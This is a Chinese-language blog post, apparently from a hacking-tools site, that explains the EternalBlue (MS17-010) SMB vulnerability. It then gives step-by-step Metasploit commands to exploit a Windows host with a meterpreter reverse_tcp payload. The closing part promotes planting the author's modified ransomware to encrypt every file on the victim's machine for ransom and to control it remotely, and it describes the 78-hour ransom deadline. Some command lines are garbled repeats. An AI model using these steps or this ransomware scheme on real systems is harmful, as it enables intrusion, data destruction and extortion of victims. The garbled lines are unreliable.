免责声明
本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。
文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。
——鼹鼠
累的话就听点音乐吧~~
一、什么是永恒之蓝?
永恒之蓝爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件
2、什么是SMB协议?
SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的:SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
3、SMB工作原理是什么?
(1):首先客户端发送一个SMB negport 请求数据报,并列出它所支持的所有SMB的协议版本。服务器收到请求消息后响应请求,并列出希望使用的SMB协议版本。如果没有可以使用的协议版本则返回0XFFFFH,结束通信。
(2):协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送Sessetupx请求数据包实现的。客户端发送一对用户名和密码或一个简单密码到服务器,然后通过服务器发送一个sessetupX应答数据包来允许或拒绝本次连接。
(3):当客户端和服务器完成了磋商和认证之后,它会发送一个Tcon或TconX SMB数据报并列出它想访问的网络资源的名称,之后会发送一个Tconx应答数据报以表示此次连接是否接收或拒绝。
(4):连接到相应资源后,SMB客户端就能够通过open SMB打开一个文件,通过read SMB读取文件,通过write SMB写入文件,通过cose SMB关闭文件。
二、漏洞复现过程
1、查看kali(攻击机)的IP地址
ka]i开机后登录系统,在桌面空白处右键鼠标,点击“在这里打开终端”,然后在终端中输入ifconfig命令,按回车执行该命令,命令执行完成后即可查看到IP地址
ifconfig
这里我们可以看到IP地址是
192.168.10.128
我们使用“nmap”扫描
nmap -sP 192.168.10.0/24
扫描结果:
其中192.168.10.129 就是攻击目标
然后我们启动 msfconsole
msfconsole
msfconsole是一个强大的网络安全工具,也是metasploit框架中的一个组件。它提供了一个一体化的集中控制台,允许用户访问和使用metasploit框架中的所有插件、payload、利用模块以及post模块等。通过这个控制台,用户可以执行各种安全测试任务,如扫描、漏洞利用和后渗透操作等。
msfconsole集成了许多漏洞利用脚本,支持自动化和交互式操作,使用户能够快速地执行各种任务,而无需深入了解框架的内部工作原理。它提供了丰富的命令和选项,帮助用户快速完成任务,并提供了各种插件和模块以扩展其功能。
此外,msfconsole还具备第三方程序接口,如nmap、sqlmap等,这些工具可以直接在msfconsole中使用,为渗透测试提供了极大的便利。用户可以在msfconsole中使用系统的命令,如ping命令、ifconfig命令等,以更好地执行渗透测试任务。
作为一个开源的渗透测试框架,msfconsole拥有强大的社区支持和更新,用户可以受益于全球各地的安全专业人士的贡献,以及最新的漏洞利用等方面的更新。
搜索永恒之蓝漏洞 编号:ms17-010
search ms17-010
一共有6个漏洞模块
我们选择模块“1”
use auxiliary/scanner/smb/smb ms17 010
查看参数设置
show options
添加目标
set rhosts 192.168.10.129
运行模块
run
进行攻击配置
back
use exploit/windows/smb/ms17 010 eternalblue
载荷模块设置
我们推荐使用“15 windows/x64/meterpreter/reverse tcp”
nmap -sP 192.168.10.0/24
0
然后再次查看还有那些可以设置
show options
可以看到目标买没有设置,我们进行设置目标
nmap -sP 192.168.10.0/24
2
配置完成后我们进行攻击
2.开始攻击
run
连接成功
然后我们就可以乱搞了
nmap -sP 192.168.10.0/24
4
因为我们已经看到了这台系统的所有信息,对密码进行MD5破译解密,可以看到真实的密码。
我们可以将我们魔改后的“鼹鼠爸爸”集成化系统植入此被攻击的机器,
打开攻击模式/~ 病毒勒索模式/~ 输入IP地址以及密码进行执行/~ 以后将都可使用“鼹鼠爸爸”对此机器进行攻击勒索加密所有文件~也可以远程操控
关于“鼹鼠爸爸”文件都被RSA-1024的非对称加密方式给加密了,想要让文件恢复,你需要私钥(RSA加密算法是非对称加密算法,有一对密码称为公钥和私钥,必须二者都有才能解锁)。
其次,文件被加密的那一瞬间开始倒数78小时,超过这个时间服务器将销毁这些文件的私钥。想取回私钥,将你的数字证书通过邮件的方式给攻击者发过去并等待下一步指示。
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...